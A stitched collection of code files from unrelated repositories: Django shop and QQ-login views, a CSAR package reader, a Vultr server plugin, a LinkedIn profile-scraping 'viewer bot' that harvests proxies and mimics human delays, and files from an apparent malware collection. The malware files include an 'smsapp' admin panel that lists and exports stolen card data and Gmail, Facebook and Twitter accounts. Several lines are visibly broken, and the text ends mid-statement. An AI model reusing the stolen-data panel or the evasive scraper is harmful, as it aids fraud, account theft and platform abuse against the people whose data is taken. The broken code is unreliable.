{ "source": "00wsmart00/meiduo_project_all", "score": 2 }
#### File: apps/contents/ ```python from django.shortcuts import render # Create your views here. from django.views import View from contents.models import ContentCategory from goods.utils import get_categories class IndexView(View): """首页广告""" def get(self, request): """提供首页广告界面""" # 查询商品频道和分类 categories = get_categories() # 定义一个空的字典 dict = {} # 查询出所有的广告类别 content_categories = ContentCategory.objects.all() # 遍历所有的广告类别, 然后放入到定义的空字典中: for cat in content_categories: # 获取类别所对应的展示数据, 并对数据进行排序: # key:value ==> 商品类别.key:具体的所有商品(排过序) dict[cat.key] = cat.content_set.filter(status=True).order_by('sequence') # 拼接参数: context = { # 这是首页需要的一二级分类信息: 'categories': categories, # 这是首页需要的能展示的三级信息: 'contents': dict, } # 返回界面, 同时传入参数: return render(request, 'index.html', context=context) ``` #### File: apps/oauth/ ```python import re from QQLoginTool.QQtool import OAuthQQ from django import http from django.conf import settings from django.contrib.auth import login from django.db import DatabaseError from django.shortcuts import render, redirect from django_redis import get_redis_connection # Create your views here. from django.urls import reverse from django.views import View from meiduo_mall.utils.response_code import RETCODE import logging from oauth.models import OAuthQQUser from oauth.utils import generate_access_token, check_access_token from users.models import User logger = logging.getLogger('django') class QQUserView(View): """用户扫码登录的回调处理""" def get(self, request): """Oauth2.0认证""" # 接收Authorization Code code = request.GET.get('code') if not code: return http.HttpResponseForbidden('缺少必传参数') # 创建工具对象 oauth = OAuthQQ(client_id=settings.QQ_CLIENT_ID, client_secret=settings.QQ_CLIENT_SECRET, redirect_uri=settings.QQ_REDIRECT_URI) try: # 携带code向qq服务器请求access_token access_token = oauth.get_access_token(code) # 携带access_token去请求openid openid = oauth.get_open_id(access_token) except Exception as e: logger.error(e) return http.HttpResponseForbidden('OAuth2.0认证失败') # 使用openID去判断用户是否存在 try: oauth_user = OAuthQQUser.objects.get(openid=openid) except OAuthQQUser.DoesNotExist: # 用户不存在 access_token = generate_access_token(openid) # 拿到access_token,渲染到模板中返回 context = {'access_token': access_token} return render(request, 'oauth_callback.html', context) pass else: # 用户存在 # 根据外键,获取对应的QQ用户 user = oauth_user.user # 实现状态保持 login(request, user) # 创建重定向到首页 response = redirect(reverse('contents:index')) # 写入cookie,15天 response.set_cookie('username', user.username, max_age=3600*24*15) # 返回响应 return response def post(self,request): # 接受参数 mobile = request.POST.get('mobile') password = request.POST.get('password') sms_code_cli = request.POST.get('sms_code') access_token = request.POST.get('access_token') # 检验参数 if not all([mobile, password, sms_code_cli]): return http.HttpResponseForbidden("缺少必传参数") # 判断手机号是否合法 if not re.match(r'^1[3-9]\d{9}$', mobile): return http.HttpResponseForbidden('手机号格式不匹配') # 判断密码是否合格 if not re.match(r'^[0-9A-Za-z]{8,20}$', password): return http.HttpResponseForbidden('请输入8-20位的密码') # 判断短信验证码是否合格 # 链接redis redis_connection = get_redis_connection('verify_code') # 从redis中获取sms_code的值 sms_code_server = redis_connection.get('sms_code_%s' % mobile) # 取不取的出来值 # 取不出 if sms_code_server is None: return render(request, 'oauth_callback.html', {'sms_code_errmsg':'无效的短信验证码'}) # 取得出 # 判断短信验证码是否一致 if sms_code_server.decode() != sms_code_cli: return render(request, 'oauth_callback.html', {'sms_code_errmsg': '输入短信验证码有误'}) # 判断access_token 是否正确 openid = check_access_token(access_token) if openid is None: return render(request, 'oauth_callback.html', {'openid_errmsg': '无效的openid'}) # 保存注册数据 try: user= User.objects.get(mobile=mobile) except User.DoesNotExist: # 用户不存在,新建用户 user = User.objects.create_user(username=mobile, password=password, mobile=mobile) else: # 如果用户存在,检查用户密码 if not user.check_password(password): return render(request, 'oauth_callback.html', {'account_errmsg': '用户名或密码错误'}) # 将用户绑定 openid try: OAuthQQUser.objects.create(openid=openid, user=user) except DatabaseError: return render(request, 'oauth_callback.html', {'qq_login_errmsg': 'QQ登录失败'}) # 实现状态保持 login(request, user) # 响应绑定结果 next = request.GET.get('state') response = redirect(next) # 登录时用户名写入到 cookie,有效期15天 response.set_cookie('username', user.username, max_age=3600 * 24 * 15) # 响应 return response class QQURLView(View): """提供QQ登录页面网址 response_type=code& client_id=xxx& redirect_uri=xxx& state=xxx """ def get(self, request): # next 表示从哪个页面进入到的登录页面 next = request.GET.get('next') # 获取QQ的登录页面网址 # 创建OAuthQQ 类的对象 oauth = OAuthQQ(client_id=settings.QQ_CLIENT_ID, client_secret=settings.QQ_CLIENT_SECRET, redirect_uri=settings.QQ_REDIRECT_URI, state=next) # 调用对象的获取QQ地址的方法 login_url = oauth.get_qq_url() return http.JsonResponse({ 'code': RETCODE.OK, 'errmsg': 'OK', 'login_url': login_url }) ```
{ "source": "01000101/aria-csar-extension", "score": 2 }
#### File: aria-csar-extension/nfvo_packager/ ```python import logging import os from shutil import rmtree from glob import glob from tempfile import mkstemp, mkdtemp import mimetypes import hashlib from base64 import b64decode from pprint import pformat import zipfile import yaml import requests from nfvo_packager import constants logging.basicConfig(level=logging.DEBUG) class CSARReader(object): ''' TOSCA Cloud Service Archive (CSAR) reader. This class is a helper for reading, validating, and extracting information from CSAR v1.1 ZIP files (locally or remotely). ''' def __init__(self, source, is_external=False, logger=None): self.log = logger or logging.getLogger('csar.reader') self.log.debug('CSARReader(%s, %s)', source, is_external) self.csar = { 'source': source, 'external': is_external, 'local': None, 'destination': None, 'metadata': None, 'artifacts': None } self._retrieve() self._extract() self._validate() def __del__(self): ''' Deletes temporary files and folders ''' if self.csar.get('local') and \ self.csar.get('source') and \ self.csar['local'] != os.path.normpath(self.csar['source']) and \ os.path.isfile(self.csar['local']): self.log.debug('Removing temporary file: %s', self.csar['local']) os.remove(self.csar['local']) if self.csar.get('destination') and \ os.path.isdir(self.csar['destination']): self.log.debug('Removing temporary directory: %s', self.csar['destination']) rmtree(self.csar['destination']) @property def has_metadata_file(self): '''Returns True if a metadata file exists''' return os.path.isfile(os.path.join(self.path, constants.META_FILE)) @property def metadata(self): '''Returns CSAR metadata''' return self.csar.get('metadata', dict()) @property def artifacts(self): '''Returns CSAR artifacts''' return self.metadata.get('artifacts', dict()) @property def path(self): '''Returns the root (extracted) CSAR directory path''' return self.csar.get('destination') @property def author(self): '''Returns the CSAR package author''' return self.metadata.get(constants.META_CREATED_BY_KEY) or \ self.metadata.get(constants.META_TMPL_AUTHOR_KEY) @property def version(self): '''Returns the CSAR version''' return self.metadata.get(constants.META_CSAR_VERSION_KEY) or \ self.metadata.get(constants.META_TMPL_VERSION_KEY) @property def metadata_file_version(self): '''Returns the CSAR metadata file version''' return self.metadata.get(constants.META_FILE_VERSION_KEY) @property def template_name(self): '''Returns the CSAR template name''' return self.metadata.get(constants.META_TMPL_NAME_KEY) @property def entry_definitions(self): '''Returns the Entry-Definitions (relative) path''' return self.metadata.get(constants.META_ENTRY_DEFINITIONS_KEY) @property def entry_definitions_yaml(self): '''Returns the TOSCA entry definitions YAML contents''' with open(os.path.join(self.path, self.entry_definitions), 'r') as mfile: return yaml.load(mfile) return dict() def _retrieve(self): ''' Fetches a CSAR package (remote or local) ''' if not self.csar['external']: self.log.debug('CSAR is local; normalizing path') self.csar['local'] = os.path.normpath(self.csar['source']) self.log.debug('CSAR local path is: %s', self.csar['local']) return # Get a temporary file self.log.debug('Generating temporary file') tmp_hndl, tmp_filename = mkstemp() self.log.debug('Temporary file is: %s', tmp_filename) # Download the archive self.log.debug('Starting remote CSAR download') req = requests.get(self.csar['source'], stream=True) for chunk in req.iter_content(chunk_size=1024): if chunk: os.write(tmp_hndl, chunk) self.log.debug('Remote CSAR downloaded; closing temporary file') os.close(tmp_hndl) # Update the CSAR definition self.csar['local'] = tmp_filename def _extract(self): ''' Extracts a CSAR package ''' if not self.csar['local']: raise RuntimeError('Missing CSAR file') if not zipfile.is_zipfile(self.csar['local']): raise RuntimeError('CSAR file is not in ZIP format') # Get a temporary directory to use self.log.debug('Generating temporary directory') tmp_dirname = mkdtemp() self.log.debug('Temporary directory is: %s', tmp_dirname) # Extract ZIP file to temporary directory self.log.debug('Extracting CSAR contents') zfile = zipfile.ZipFile(self.csar['local']) zfile.extractall(tmp_dirname) self.log.debug('CSAR contents successfully extracted') # Update the CSAR definition self.csar['destination'] = tmp_dirname def _validate(self): ''' Validates a CSAR package ''' csar_root = self.csar.get('destination') # Check for a CSAR contents folder if not csar_root or not os.path.isdir(csar_root): raise RuntimeError('Missing CSAR contents') # Validate metadata if self.has_metadata_file: self._validate_metadata_file() else: self._validate_metadata_inline() # Validate entry definitions self._validate_entry_definitions() # Validate artifacts self._validate_artifacts() def _validate_metadata_file(self): ''' Validates CSAR metadata file ''' # Check for metadata csar_metafile = os.path.join(self.path, constants.META_FILE) self.log.debug('CSAR metadata file: %s', csar_metafile) # Check the expected files/folders exist if not csar_metafile or not os.path.isfile(csar_metafile): raise RuntimeError('Missing CSAR metadata file') # Validate metadata YAML metadata = dict() self.log.debug('Attempting to parse CSAR metadata YAML') with open(csar_metafile, 'r') as mfile: metadata = yaml.load(mfile) self.log.debug('CSAR metadata:\n%s', pformat(metadata)) # Validate metadata specification if constants.META_FILE_VERSION_KEY not in metadata: raise RuntimeError('Missing metadata "%s"' % constants.META_FILE_VERSION_KEY) if str(metadata[constants.META_FILE_VERSION_KEY]) != '1.0': raise RuntimeError('Metadata "%s" must be 1.0' % constants.META_FILE_VERSION_KEY) if constants.META_CSAR_VERSION_KEY not in metadata: raise RuntimeError('Missing metadata "%s"' % constants.META_CSAR_VERSION_KEY) if str(metadata[constants.META_CSAR_VERSION_KEY]) != '1.1': raise RuntimeError('Metadata "%s" must be 1.1' % constants.META_CSAR_VERSION_KEY) if constants.META_CREATED_BY_KEY not in metadata or \ not metadata[constants.META_CREATED_BY_KEY]: raise RuntimeError('Missing metadata "%s"' % constants.META_CREATED_BY_KEY) if constants.META_ENTRY_DEFINITIONS_KEY not in metadata or \ not metadata[constants.META_ENTRY_DEFINITIONS_KEY]: raise RuntimeError('Missing metadata "%s"' % constants.META_ENTRY_DEFINITIONS_KEY) # Update the CSAR definition self.csar['metadata'] = metadata def _validate_metadata_inline(self): ''' Validates CSAR inline metadata ''' # Get a list of all definition files in the root folder root_defs = list() self.log.debug('Searching for TOSCA template file with metadata') for ext in ['yaml', 'yml']: root_defs.extend(glob('%s/*.%s' % (self.path, ext))) # Make sure there's only one if len(root_defs) is not 1: raise RuntimeError( 'Exactly 1 YAML file must exist in the CSAR root directory') # Validate metadata YAML def_data = dict() self.log.debug('Attempting to parse CSAR metadata YAML') with open(root_defs[0], 'r') as def_file: def_data = yaml.load(def_file) # Validate metadata specification metadata = def_data.get('metadata') if not metadata: raise RuntimeError('Missing metadata section') if constants.META_TMPL_VERSION_KEY not in metadata: raise RuntimeError('Missing metadata "%s"' % constants.META_TMPL_VERSION_KEY) if str(metadata[constants.META_TMPL_VERSION_KEY]) != '1.1': raise RuntimeError('Metadata "%s" must be 1.1' % constants.META_TMPL_VERSION_KEY) if constants.META_TMPL_AUTHOR_KEY not in metadata or \ not metadata[constants.META_TMPL_AUTHOR_KEY]: raise RuntimeError('Missing metadata "%s"' % constants.META_TMPL_AUTHOR_KEY) if constants.META_TMPL_NAME_KEY not in metadata or \ not metadata[constants.META_TMPL_NAME_KEY]: raise RuntimeError('Missing metadata "%s"' % constants.META_TMPL_NAME_KEY) # Update the CSAR definition metadata[constants.META_ENTRY_DEFINITIONS_KEY] = root_defs[0] self.csar['metadata'] = metadata def _validate_entry_definitions(self): ''' Validates entry definitions ''' self.log.debug('CSAR entry definitions: %s', self.entry_definitions) if not self.has_metadata_file: self.log.debug('Using inline metadata; skipping...') return if not os.path.isfile(os.path.join(self.path, self.entry_definitions)): raise RuntimeError('"%s" points to "%s", but the file ' 'does not exist' % ( constants.META_ENTRY_DEFINITIONS_KEY, self.entry_definitions)) def _validate_artifacts(self): ''' Validates artifacts ''' self.log.debug('Searching for user-defined MIME types') mtypes = glob(os.path.join(self.path, constants.META_MIMETYPES_GLOB)) self.log.debug('Loading %s user-defined MIME types', len(mtypes)) mimetypes.init(mtypes or None) self.log.debug('Checking for artifacts') if not self.artifacts: self.log.debug('No artifacts declared') return # Iterate through each artifacts for name, artifact in self.artifacts.iteritems(): self._validate_artifact(name, artifact) def _validate_artifact(self, name, artifact): ''' Validates a single artifact ''' self.log.debug('Validating artifact: %s', name) self.log.debug('Checking if artifact file exists') path = os.path.join(self.path, name) if not os.path.isfile(path): raise RuntimeError('Artifact "%s" delcared, but file does ' 'not exist' % name) # Validate the content-type if 'content-type' not in artifact: raise RuntimeError('Artifact missing "content-type"') self.log.debug('Artifact content-type: %s', artifact['content-type']) tstype = artifact['content-type'].split('/') if len(tstype) < 2: raise RuntimeError('Artifact content-type must comply with the ' '"type/subtype" structure') if not tstype[-1].startswith('vnd.'): self.log.warn('Artifact content-type subtype should start ' 'with "vnd."') # Validate content-type as a known MIME type self.log.debug('Checking content-type against known MIME types') if len([{x: y} for x, y in mimetypes.types_map.iteritems() if y == artifact['content-type']]) < 1: self.log.warn('Could not match artifact content-type ' 'with any known MIME type') # Validate the artifact MIME type against the content-type self.log.debug('Checking artifact MIME type against content-type') mtype = mimetypes.guess_type(path)[0] if mtype is None: self.log.warn('Could not match artifact to a known MIME type') if mtype != artifact['content-type']: self.log.warn('Artifact content-type does not match the ' 'artifacts MIME type') # Validate the signature / digest if 'signature' in artifact: sig = artifact['signature'] algo = sig.get('algorithm') digest = sig.get('digest') if not algo: raise RuntimeError( 'Artifact signature delcared, but no algorithm was found') if not digest: raise RuntimeError( 'Artifact signature delcared, but no digest was found') # Decode base64 encoded digest self.log.debug('Decoding base64-encoded artifact digest') digest = b64decode(digest).strip() self.log.debug('Decoded artifact digest: %s', digest) # Calculate hash of the actual artifact self.log.debug('Calculating %s digest of artifact %s', algo, name) adigest =, open(path, 'rb').read()).hexdigest() self.log.debug('Calculated artifact digest: %s', adigest) # Compare digests if digest != adigest: raise RuntimeError('Artifact digest mismatch') ```
{ "source": "01000101/cloudify-vultr-plugin", "score": 2 }
#### File: cloudify-vultr-plugin/plugin/ ```python from cloudify import ctx from cloudify.exceptions import NonRecoverableError, RecoverableError from cloudify.decorators import operation from vultr import Vultr, VultrError def _helper_get_vultr_api_key(): '''Gets the Vultr API key for use in all Vultr API calls''' return '<KEY> def _helper_get_vultr_client(): '''Returns a connected Vultr API client''' try: return Vultr(_helper_get_vultr_api_key()) except VultrError: raise NonRecoverableError( 'Connection to Vultr API failed. ' 'Incorrect / Invalid API key provided.') def _helper_get_existing_server(client, resource_id): '''Returns a JSON object for an existing server''' if (not client) or (not resource_id): return None return client.server_list(resource_id) def provision_server(client, opts): '''Provisions a new server on the provider''' _err = False if not opts.get('vps_plan_id'): _err = True ctx.logger.error('Missing VPSPLANID (Subscription Plan) ' 'from the node properties') if not opts.get('os_id'): _err = True ctx.logger.error('Missing OSID (Image) from the node properties') if not opts.get('dc_id'): _err = True ctx.logger.error('Missing DCID (Location) from the node properties') if _err: NonRecoverableError('Missing required node properties')'\nProvisioning new server with properties:\n' '{0}' . format(opts)) try: result = client.server_create( opts.get('dc_id'), opts.get('vps_plan_id'), opts.get('os_id'), label=opts.get('label'), sshkeyid=opts.get('ssh_key_id') ) except VultrError, ex: ctx.logger.error('Exception: {0}' . format(ex)) RecoverableError('Could not create the server') return result.get('SUBID') def server_is_active(client, sub_id): '''Checks if a Vultr server is active or not''' instance = _helper_get_existing_server(client, sub_id) if instance: if instance.get('status', '') == 'active': if instance.get('server_state', '') == 'ok': return True return False @operation def run_instances(**_): '''This actually creates the Vultr server''' client = _helper_get_vultr_client() cfy_agent ='cloudify_agent', dict()) bs_cfy_agent = ctx.bootstrap_context.cloudify_agent cfy_user = cfy_agent.get('user', bs_cfy_agent.user) cfy_key = cfy_agent.get('key', bs_cfy_agent.agent_key_path)'BootstrapContext.cloudify_agent: {0}' . format(vars(bs_cfy_agent)))'SSH User: {0}, Key: {1}' . format(cfy_user, cfy_key)) # Get the Vultr SUBID (indicating that we're using an existing resource) sub_id ='SUBID') if sub_id:'Using SUBID: {0}' . format(sub_id)) # Get the server information (if it exists) server = _helper_get_existing_server(client, sub_id) if server:'Vultr server: {0}' . format(server)) # External resource doesn't exist when it's supposed to if sub_id and not server: raise NonRecoverableError( 'External resource, but the supplied ' 'server SUBID is not in the account.') # External resource exists when it's not supposed to if not sub_id and server: raise NonRecoverableError( 'Not external resource, but the supplied ' 'but the server already exists.') # External resource information dump if sub_id: '\nExternal resource:\n' ' Label: {0}\n' ' SUBID: {1}\n' ' OS: {2}\n' ' vCPUs: {3}\n' ' RAM: {4}\n' ' DISK: {5}\n' ' Location: {6}\n' ' IP: {7}' . format( server['label'], server['SUBID'], server['os'], server['vcpu_count'], server['ram'], server['disk'], server['location'], server['main_ip'] ) ) ctx.instance.runtime_properties['ip'] = server['main_ip'] return else: if ctx.operation.retry_number == 0: extra_opts ='CONFIG', dict()) # Actually request the server be created sub_id = provision_server( client, { 'vps_plan_id':'VPSPLANID'), 'os_id':'OSID'), 'dc_id':'DCID'), 'label': extra_opts.get('label'), 'ssh_key_id': extra_opts.get('SSHKEYID') } ) if not sub_id: NonRecoverableError( 'Unable to provision a new server. ' 'Provider did not issue a SUBID.' ) ctx.instance.runtime_properties['SUBID'] = sub_id else: sub_id = ctx.instance.runtime_properties.get('SUBID') if server_is_active(client, sub_id):'Server has been provisioned ' 'with SUBID {0}' . format(sub_id)) server = _helper_get_existing_server(client, sub_id) ctx.instance.runtime_properties['ip'] = \ server.get('main_ip')'Server Information:\n{0}' . format(server))'Runtime properties:\n{0}' . format(ctx.instance.runtime_properties))'Properties:\n{0}' . format( return return ctx.operation.retry( message='Waiting for server {0} to be ' 'added to your account.' . format(sub_id)) @operation def stop(**_): '''Terminates all existing Vultr servers''' client = _helper_get_vultr_client() sub_id = ctx.instance.runtime_properties.get('SUBID') if not sub_id: return'Attempting to destroy server SUBID={0}' . format(sub_id)) try: res = client.server_destroy(sub_id)'Result: {0}' . format(res)) except VultrError, ex: ctx.logger.error('Exception: {0}' . format(ex)) return ctx.operation.retry( message='Waiting to destroy server {0}. ' '(note: you cannot destroy Vultr servers within ' '5 minutes of creation)' . format(sub_id)) ```
{ "source": "01000101/LinkedIn-Viewer-Bot", "score": 3 }
#### File: 01000101/LinkedIn-Viewer-Bot/ ```python import logging import json import codecs from random import randint, shuffle from time import sleep from pprint import pformat from lxml import html import urllib3 from requests import Session from requests.adapters import HTTPAdapter from selenium import webdriver from import By from import WebDriverWait from import expected_conditions as EC logging.basicConfig(level=logging.DEBUG) logging.getLogger('requests.packages.urllib3').setLevel(logging.WARNING) logging.getLogger('selenium.webdriver.remote').setLevel(logging.WARNING) # Authentication LINKEDIN_USERNAME = '' LINKEDIN_PASSWORD = '' # Configuration LINKEDIN_SEARCH_TERMS = ['technical recruiter', 'engineering recruiter'] LINKEDIN_START_PROFILES = [] # Connection USER_AGENT = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) ' \ 'Gecko/20100101 Firefox/34.0' LINKEDIN_PROFILE_URL = '' # Public profile X_PROFILE_NAME = \ '//div[@class="profile-overview-content"]' \ '//h1[@id="name"]/text()' # Public profile experiences X_PROFILE_EXPERIENCES = '//section[@id="experience"]/ul/li' X_EXPERIENCE_TITLE = './/header/h4[@class="item-title"]//text()' X_EXPERIENCE_COMPANY = './/header/h5[@class="item-subtitle"]//text()' # Public profile suggestions X_PROFILE_SUGGESTIONS = \ '//div[@id="aux"]//div[@class="browse-map"]' \ '/ul/li[contains(@class, "profile-card")]' X_SUGGESTION_NAME = './div[@class="info"]/h4[@class="item-title"]/a/text()' X_SUGGESTION_URL = './div[@class="info"]/h4[@class="item-title"]/a/@href' X_SUGGESTION_HEADLINE = './div[@class="info"]/p[@class="headline"]/text()' # GatherProxy XPaths P_GP_PROXIES = '//table[@id="tblproxy"]/tr' def _single(arr): '''Returns the first array item or None''' return arr[0] if len(arr) > 0 else None def find_by_xpath(driver, xpath): '''Finds an element by XPATH''' return WebDriverWait(driver, 10).until( EC.presence_of_element_located((By.XPATH, xpath))) def authenticate(driver): '''Starts an authenticated session''' driver.get('') find_by_xpath(driver, '//input[@name = "session_key"]').send_keys( LINKEDIN_USERNAME) find_by_xpath(driver, '//input[@name = "session_password"]').send_keys( LINKEDIN_PASSWORD) find_by_xpath(driver, '//input[@id = "btn-primary"]').click() sleep(2) class ProxyCrawler(object): ''' Crawles proxy list websites to harvest usable proxies ''' def __init__(self): self.log = logging.getLogger('linkedout.proxy') self.proxies = self.crawl_gatherproxy() def crawl_gatherproxy(self): '''Scrape GatherProxy for proxies''' baseurl = '' searchurl = baseurl + 'proxylist/anonymity/?t=Elite' searchpage = 1 session = self.get_session_connection(baseurl) proxies = list() # Search for searchpage in range(1, 3): self.log.debug('Fetching GatherProxy proxy list') self.log.debug('| page: %s', searchpage) res = session.request( url=searchurl, method='post', data='Type=elite&PageIdx=%s&Uptime=0' % (searchpage), headers={ 'Content-Type': 'application/x-www-form-urlencoded' }) self.log.debug('|_status code: %s', res.status_code) if res.status_code is not 200: return None # Set up for XPath tree = html.fromstring(res.text) # Close our session session.close() # Find the person's name proxy_rows = tree.xpath(P_GP_PROXIES)[2:] for proxy_row in proxy_rows: raw_cols = proxy_row.xpath('./td/text()') proxy_cols = proxy_row.xpath('./td/script/text()') proxies.append({ 'ip': proxy_cols[0].replace( 'document.write(\'', '').replace('\')', ''), 'port': int(proxy_cols[1].replace( 'document.write(gp.dep(\'', '').replace( '\'))', ''), 16), 'location': raw_cols[2], 'speed': int(raw_cols[5].replace('ms', '')) }) self.log.debug('Proxies: %s', pformat(proxies)) @staticmethod def get_session_connection(baseurl): ''' Creates a `requests.Session` instance and includes basic connection fault tolerance. :returns: A configured requests.Session instance :rtype: :class:`requests.Session` ''' # Build a session object with some fault tolerance # Retry up to 10 times with increasing backoff time # up to 120 seconds. session = Session() session.mount( baseurl, HTTPAdapter( max_retries=urllib3.util.Retry( total=10, backoff_factor=0.4, status_forcelist=[500, 501, 502, 503, 504] ))) session.headers = { 'User-Agent': USER_AGENT } return session class LinkedInCrawler(object): ''' Helper to crawl public LinkedIn pages and acting as a spider collecting information about profiles to feed to a viewer instance. :param list terms: List of search terms to crawl :param bool public: True for public profiles, False for authenticated / private profiles ''' def __init__(self, terms=None, public=True): self.log = logging.getLogger('linkedout.crawler') self.terms = [x.lower() for x in terms or list()] or None self.public = public self._active_list = list() def build_profile_list(self, profile_urls, depth=1): ''' Builds a list of public profile information based on recursive suggestion searches :param list profile_urls: List of public profiles to crawl from :param int depth: Suggestions crawl depth :returns: List of profiles :rtype: list ''' self._active_list = list() people = list() # Normalize types if isinstance(profile_urls, basestring): profile_urls = [profile_urls] # Crawl profiles for profile_url in profile_urls: people.extend(self._build_profile_list(profile_url, depth)) # Remove empty items and return return [x for x in people if x is not None] def _build_profile_list(self, profile_url, depth=1): '''Worker for build_profile_list()''' self.log.debug('build_profile_list(%s, %s)', profile_url, depth) active = self.parse_public_profile(profile_url) if not active: return list() # Redundancy check list self._active_list.append(active.get('name')) self.log.debug('Active list: %s', self._active_list) people = [active] if depth: for suggestion in active.get('suggestions', list()): sname = suggestion.get('name') if not sname: self.log.warn('A suggestion has no name') continue # Check that there's a profile URL if not suggestion.get('url'): self.log.warn('Suggestion "%s" missing URL', sname) continue # Check that we're not repeating ourselves if suggestion.get('name') in set(self._active_list): self.log.warn('Suggestion "%s" already crawled', sname) continue # Weed out profiles that don't match the terms set if not suggestion.get('headline'): self.log.warn('Suggestion "%s" has no headline', sname) continue headline = suggestion.get('headline', '').lower() if self.terms and \ len([x for x in self.terms if x in headline]) < 1: self.log.warn('Suggestion "%s" doesn\'t match terms set', sname) continue # Act totally not like a Python bot sleep(randint(1, 10)) # Enter recursion hell people.extend(self._build_profile_list( suggestion['url'], depth=depth-1)) return people def parse_public_profile(self, profile_url): ''' Parses a public user profile for key properties (name, experience, etc...) :returns: Profile information :rtype: dict ''' session = self.get_session_connection() person = dict() # Normalize profile link if not profile_url.startswith(LINKEDIN_PROFILE_URL): profile_url = LINKEDIN_PROFILE_URL + profile_url self.log.debug('Fetching public profile') self.log.debug('| url: %s', profile_url) self.log.debug('| method: GET') # Request the page res = session.request(url=profile_url, method='get') self.log.debug('|_status code: %s', res.status_code) if res.status_code is not 200: return None # Set up for XPath tree = html.fromstring(res.text) # Close our session session.close() # Save the person's profile link person['url'] = profile_url # Find the person's name person['name'] = _single(tree.xpath(X_PROFILE_NAME)) # Find experience person['experiences'] = list() for experience in tree.xpath(X_PROFILE_EXPERIENCES): person['experiences'].append({ 'title': _single(experience.xpath(X_EXPERIENCE_TITLE)), 'company': _single(experience.xpath(X_EXPERIENCE_COMPANY)), 'date': { 'start': _single(experience.xpath('.//time[1]/text()')), 'end': _single(experience.xpath('.//time[2]/text()')) } }) # Find suggested profiles person['suggestions'] = list() for suggestion in tree.xpath(X_PROFILE_SUGGESTIONS): url = _single(suggestion.xpath(X_SUGGESTION_URL)) if url: url = url.split('?')[0] person['suggestions'].append({ 'url': url, 'name': _single(suggestion.xpath(X_SUGGESTION_NAME)), 'headline': _single(suggestion.xpath(X_SUGGESTION_HEADLINE)) }) self.log.debug('Profile information: %s', json.dumps(person, indent=2)) return person @staticmethod def get_session_connection(): ''' Creates a `requests.Session` instance and includes basic connection fault tolerance. :returns: A configured requests.Session instance :rtype: :class:`requests.Session` ''' # Build a session object with some fault tolerance # Retry up to 10 times with increasing backoff time # up to 120 seconds. session = Session() session.mount( LINKEDIN_PROFILE_URL, HTTPAdapter( max_retries=urllib3.util.Retry( total=10, backoff_factor=0.4, status_forcelist=[500, 501, 502, 503, 504] ))) session.headers = { 'User-Agent': USER_AGENT } return session def main(): '''Entry point''' # Get a list of usable proxies # proxylist = ProxyCrawler() # Init the crawler crawler = LinkedInCrawler(LINKEDIN_SEARCH_TERMS) # Build a list to use for searching people = crawler.build_profile_list(LINKEDIN_START_PROFILES, depth=3) print 'People: %s' % json.dumps(people, indent=2) # Roll the dice, mix up the list shuffle(people) # Get a browser driver driver = webdriver.Chrome() # Get an authenticated session authenticate(driver) # Read in parsable list of profiles to start with for person in people: print 'Viewing profile: "%s"' % person['name'] driver.get(person['url']) _sleep_cnt = randint(2, 45) print '|_sleeping %s seconds' % _sleep_cnt sleep(_sleep_cnt) print 'Successfully viewed %s profiles' % len(people) if __name__ == "__main__": main() ```
{ "source": "010001111/Vx-Suites", "score": 3 }
#### File: Vx-Suites/Python.FancyBear/ ```python import sys ######################################################################## class ConsoleLogger(object): def log_exception(self, message=''): if message: message += " - " print "#! EXC: ", message, sys.exc_info()[0].__name__, ":", sys.exc_info()[1] def log_error(self, message): print "#! ERR:", message def log_warning(self, message): print "#! WAR:", message def log_message(self, message): print "#>", message if __name__ == '__main__': logger = ConsoleLogger() try: raise BaseException("OoooopS! Exception!") except: logger.log_exception("WTF?!") try: raise ValueError("OoooopS! Exception! 2") except: logger.log_exception() logger.log_error("Test Error") logger.log_warning("Test Warning") logger.log_message("Test message") ``` #### File: gui/terminal/ ```python import dsz import dsz.lp.alias import dsz.lp.cmdline import dsz.path import dsz.version import os import re import sys import xml.dom.minidom class NewTerminal: def __init__(self): self.bFocus = False self.bClose = False self.bDisable = False self.dst = dsz.script.Env['target_address'] self.bDetach = False; self.locX = 0 self.locY = 0 self.sizeWidth = 0 self.sizeHeight = 0 = None self.command = None def setDetach(self, width, height, x, y): self.bDetach = True self.locX = x self.locY = y self.sizeWidth = width self.sizeHeight = height return True def setLocation(self, x, y): self.bDetach = True self.locX = x self.locY = y return True def setSize(self, width, height): self.sizeWidth = width self.sizeHeight = height return True def setFocus(self, value=True): self.bFocus = value def setClose(self, value=True): self.bClose = value def setDisable(self, value=True): self.bDisable = value def setDestination(self, dest): self.dst = dest def setName(self, newName): = newName def setCommand(self, cmd): self.command = cmd def spawn(self): cmd = "gui -command \".newterm "; if self.bFocus: cmd += "-focus " if self.bClose: cmd += "-close " if self.bDisable: cmd += "-disable " if self.bDetach: cmd += "-detach=%dx%d@%d,%d " % (self.sizeWidth, self.sizeHeight, self.locX, self.locY) if self.dst <> None: cmd += "-dst=%s " % self.dst if <> None: cmd += "-name=\\\"%s\\\" " % if self.command <> None: cmd += "-cmd=\\\"%s\\\" " % self.command cmd += "\""; return dsz.cmd.Run(cmd) ``` #### File: smsg_r/smsapp/ ```python import logging from bson.objectid import ObjectId from django import forms from django.conf import settings from django.contrib import messages from django.contrib.admin.views.decorators import staff_member_required from django.shortcuts import render, redirect, get_object_or_404 from django.utils.translation import ugettext_lazy as _ from decorators import admin_user_required import models import commands logger = logging.getLogger(__name__) @staff_member_required def card_info_list(request, export=None): info = settings.MONGO['extra_data'].find( {'type': 'userdata', 'data.type': 'card information', 'hidden': {'$ne': 'y'}}) cl = {'opts': {'app_label': "smsapp"}} tmpl = 'admin/smsapp/info/cards.html' ct = "text/html" if export: tmpl = 'admin/smsapp/info/cards.txt' ct = "text/plain" return render(request, tmpl, {'cards': info, 'cl': cl}, content_type=ct) @staff_member_required def hide_card_info(request, oid): settings.MONGO['extra_data'].update({"_id": ObjectId(oid)}, {'$set': {'hidden': 'y'}}) return redirect('card_list') @admin_user_required def account_info_list(request): app_types = ( ('', '----'), ('gm', 'Gmail'), ('fb', 'Facebook'), ('tw', 'Twitter'), ) class AccTypeForm(forms.Form): t1 = forms.ChoiceField(choices=app_types, label=_("account type"), required=False) type_filter = {'type': 'userdata', 'data.type': 'account'} if request.POST.get('t1'): type_filter[''] = request.POST.get('t1') info = settings.MONGO['extra_data'].find(type_filter) cl = {'opts': {'app_label': "smsapp"}} return render(request, 'admin/smsapp/info/accounts.html', {'accounts': info, 'cl': cl, 'type_form': AccTypeForm(request.POST or None)}) @admin_user_required def billing_acc_list(request): acc_types = [ ('', '----') ] ts = 